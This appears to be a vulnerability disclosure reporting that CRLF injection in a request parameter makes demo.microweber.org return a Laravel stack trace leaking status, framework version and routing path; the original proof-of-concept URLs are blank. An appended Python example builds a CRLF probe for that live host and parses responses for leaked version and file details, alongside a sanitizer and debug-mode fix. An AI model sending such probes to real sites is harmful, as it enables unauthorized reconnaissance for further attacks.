CRLF Injection leads to Stack Trace Exposure due to lack of filtering at https://demo.microweber.org/ in microweber/microweber
Feb 17th 2022
Injecting a newline character (CRLF) into a request parameter makes demo.microweber.org return an application stack trace to the attacker. The issue is made more significant by how little effort it takes to trigger: no authentication or special tooling is needed, only a modified URL.
The stack trace discloses the following information:
- The backend HTTP response code.
- The version of the Laravel framework used by the backend.
- The routing path of the request that failed.
Proof of Concept
- Visit the following URL:
- Now add the CRLF payload to the parameter. It will look like this:
This vulnerability discloses a sensitive stack trace from the back-end. The framework version and routing information it leaks let an attacker refine further attacks against the application.
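The probe and triage steps described above, as an added example that is not part of the original report or of the microweber project. It builds the percent-encoded CRLF probe for a query parameter, then classifies a captured response for the facts the report says the trace leaks (status code, framework version, routing path). The parameter name `q`, the query string, and the two sample HTML responses are constructed for this example; the report does not name the vulnerable parameter. The sample error page is modelled on a Laravel debug page, which is an assumption about what the target returns.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# A carriage return + line feed pair; sent on the wire as %0D%0A.
CRLF = "\r\n"


def build_crlf_probe(url: str, param: str, marker: str = "X-Injected: crlf") -> str:
    """Set `param` in `url` to a value embedding CR LF plus a marker header
    line, percent-encoded the way a browser or curl would send it.
    `param` is a placeholder: the report does not name the parameter."""
    parts = urlsplit(url)
    query = dict(parse_qsl(parts.query, keep_blank_values=True))
    query[param] = "probe" + CRLF + marker
    return urlunsplit(parts._replace(query=urlencode(query)))


def sanitize_header_value(value: str) -> str:
    """Defensive counterpart: drop CR and LF before a user-controlled value
    reaches a response header, so the probe can neither split the header
    nor trip the framework's error handler."""
    return value.replace("\r", "").replace("\n", "")


# Loose indicators of a Laravel debug page (Ignition / Whoops) or a raw PHP
# trace. Written loosely on purpose: the exact markup differs by version.
_LARAVEL_VERSION = re.compile(r"Laravel\s+v?(\d+\.\d+(?:\.\d+)?)", re.I)
_PHP_VERSION = re.compile(r"PHP\s+v?(\d+\.\d+(?:\.\d+)?)", re.I)
_EXCEPTION = re.compile(r"\b((?:[A-Za-z_]\w*\\)*[A-Za-z_]\w*(?:Exception|Error))\b")
_PHP_FRAME = re.compile(r"((?:/[\w.-]+)+\.php)(?::(\d+))?")
_ROUTE = re.compile(r"\bRoute(?:\s+name)?\s*[:=]\s*([^\n<]+)", re.I)


def triage_response(status: int, body: str) -> dict:
    """Classify one HTTP response captured after sending the probe.

    Returns the facts the report lists as leaked (status, framework version,
    routing path) plus exception class and PHP source files, and a verdict.
    A 5xx on its own is not treated as a leak: a generic error page with no
    trace is not the finding described in the report."""
    laravel = _LARAVEL_VERSION.search(body)
    php = _PHP_VERSION.search(body)
    exc = _EXCEPTION.search(body)
    files = sorted({m.group(1) for m in _PHP_FRAME.finditer(body)})
    route = _ROUTE.search(body)
    findings = {
        "status": status,
        "laravel_version": laravel.group(1) if laravel else None,
        "php_version": php.group(1) if php else None,
        "exception": exc.group(1) if exc else None,
        "files": files,
        "route": route.group(1).strip() if route else None,
    }
    findings["stack_trace_exposed"] = bool(exc or files or laravel)
    return findings


# Constructed sample responses (not captured from the target). The paths,
# versions and route are illustrative values only.
DEBUG_PAGE_SAMPLE = """<!doctype html><html><head><title>ErrorException</title></head><body>
<h1>ErrorException</h1>
<p>Header may not contain more than a single header, new line detected</p>
<div class="frame">/var/www/html/vendor/laravel/framework/src/Illuminate/Http/ResponseTrait.php:63</div>
<div class="frame">/var/www/html/app/Http/Controllers/PageController.php:118</div>
<div class="context">Route: GET /example-page</div>
<footer>Laravel v8.83.1 (PHP v7.4.28)</footer>
</body></html>"""

CLEAN_PAGE_SAMPLE = "<!doctype html><html><body><h1>Server Error</h1></body></html>"


if __name__ == "__main__":
    print(build_crlf_probe("https://demo.microweber.org/?q=1", "q"))
    print(triage_response(500, DEBUG_PAGE_SAMPLE))
    print(triage_response(500, CLEAN_PAGE_SAMPLE))
```

Run the triage over a saved response rather than live output; the verdict requires a trace-style artefact (exception class, PHP source path or framework banner), not merely a 5xx status. On the defensive side, `sanitize_header_value` is the input-side fix for the injection itself, but a Laravel application only renders a stack trace page when debug mode is enabled, so the deployment fix is to run production with `APP_DEBUG=false` in addition to filtering CR and LF from values that reach headers.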
I hope you understand this issue and fix it as soon as possible. Thank you.